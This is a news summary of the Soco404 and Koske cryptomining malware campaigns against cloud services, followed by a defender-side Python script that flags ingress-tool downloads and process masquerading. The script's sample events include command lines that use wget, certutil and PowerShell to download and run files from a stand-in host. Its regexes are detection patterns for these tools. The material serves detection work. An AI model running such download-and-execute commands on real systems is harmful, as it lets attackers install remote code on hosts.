Soco404 and Koske Malware Target Cloud Services with Cross-Platform Cryptomining Attacks
Briefly

Soco404 and Koske malware campaigns target vulnerabilities in cloud environments to deploy cryptocurrency miners. Soco404 deploys malware on both Linux and Windows systems and uses process masquerading to hide malicious activity. The attackers exploit weak credentials in services like Apache Tomcat and abuse PostgreSQL instances for remote code execution. They use fake 404 HTML pages for payload delivery and have targeted a legitimate Korean transportation website. Their strategy involves automated scanning for accessible entry points, employing various tools to gain access.
The attacker behind Soco404 appears to be conducting automated scans for exposed services, aiming to exploit any accessible entry point. Their use of a wide range of ingress tools, including Linux utilities like wget and curl, as well as Windows-native tools such as certutil and PowerShell, highlights an opportunistic strategy.
Soco404 targets both Linux and Windows systems, deploying platform-specific malware. They use process masquerading to disguise malicious activity as legitimate system processes.
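As an added defender-side example (not code from the article, The Hacker News, or the researchers it summarizes), the following Python sketch turns the two observations above into checks that can run over process-creation telemetry: flagging ingress via wget, curl, certutil and PowerShell fetching from a remote URL, and flagging process masquerading, where a process carries the name of a system process but runs from an image path a genuine instance would never use. The sample events, the `example.invalid` host names and the table of expected system-process locations are constructed assumptions for illustration only, not indicators from the campaign.

```python
import re
from pathlib import PurePosixPath, PureWindowsPath

# Constructed process-creation records (assumed shape; NOT real telemetry).
# Each record: platform, process name as reported, on-disk image path, command line.
SAMPLE_EVENTS = [
    {"os": "linux", "name": "[kworker/0:1]", "image": "/tmp/.x/kworker",
     "cmdline": "/tmp/.x/kworker"},
    {"os": "linux", "name": "bash", "image": "/usr/bin/bash",
     "cmdline": "bash -c 'wget -q -O /tmp/.s http://example.invalid/s; chmod +x /tmp/.s; /tmp/.s'"},
    {"os": "linux", "name": "sshd", "image": "/usr/sbin/sshd",
     "cmdline": "sshd: user@pts/0"},
    {"os": "windows", "name": "certutil.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/ok.exe C:\Users\Public\ok.exe"},
    {"os": "windows", "name": "svchost.exe", "image": r"C:\Users\Public\svchost.exe",
     "cmdline": r"C:\Users\Public\svchost.exe"},
    {"os": "windows", "name": "svchost.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"os": "windows", "name": "powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -NoProfile -Command "Invoke-WebRequest http://example.invalid/a.ps1 -OutFile C:\Users\Public\a.ps1"'},
]

# Ingress patterns: the tools named in the summary, combined with a remote fetch.
INGRESS_PATTERNS = [
    re.compile(r"\b(wget|curl)\b.*https?://", re.I),
    re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I),
    re.compile(r"\bpowershell(\.exe)?\b.*(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient)", re.I),
]

# Assumed table of legitimate system-process locations. An empty string marks a
# kernel thread, which has no on-disk image at all; anything with an image path
# that borrows such a name is suspect.
SYSTEM_PROCESSES = {
    "linux": {"kworker": "", "kthreadd": "", "sshd": "/usr/sbin", "cron": "/usr/sbin"},
    "windows": {"svchost.exe": r"C:\Windows\System32", "lsass.exe": r"C:\Windows\System32",
                "csrss.exe": r"C:\Windows\System32"},
}


def base_name(proc_name):
    """Normalise reported names such as '[kworker/0:1]' to 'kworker'."""
    return proc_name.strip("[]").split("/")[0].lower()


def is_ingress_download(cmdline):
    """True when the command line uses one of the ingress tools to fetch from a URL."""
    return any(p.search(cmdline) for p in INGRESS_PATTERNS)


def is_masquerading(event):
    """True when a system-process name is used by an image outside its expected directory."""
    table = SYSTEM_PROCESSES.get(event["os"], {})
    name = base_name(event["name"])
    if name not in table:
        return False
    expected_dir = table[name]
    if expected_dir == "":                      # kernel thread: must have no image
        return bool(event["image"])
    if event["os"] == "windows":
        actual_dir = str(PureWindowsPath(event["image"]).parent)
    else:
        actual_dir = str(PurePosixPath(event["image"]).parent)
    return actual_dir.lower() != expected_dir.lower()


def triage(events):
    """Return only the events that trip at least one check, with the reasons."""
    findings = []
    for i, ev in enumerate(events):
        flags = []
        if is_masquerading(ev):
            flags.append("process_masquerading")
        if is_ingress_download(ev["cmdline"]):
            flags.append("ingress_tool_download")
        if flags:
            findings.append({"index": i, "name": ev["name"], "flags": flags})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f['index']:>2}  {f['name']:<16} {', '.join(f['flags'])}")
```

The image-path check is deliberately stricter than a name match: the genuine `svchost.exe` in `System32` passes, while a same-named binary under a user-writable directory does not. In production the expected-location table would come from the host's own baseline rather than a hard-coded list, and the ingress patterns would be tuned against the admin tooling that legitimately uses curl or certutil in that environment.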
Read at The Hacker News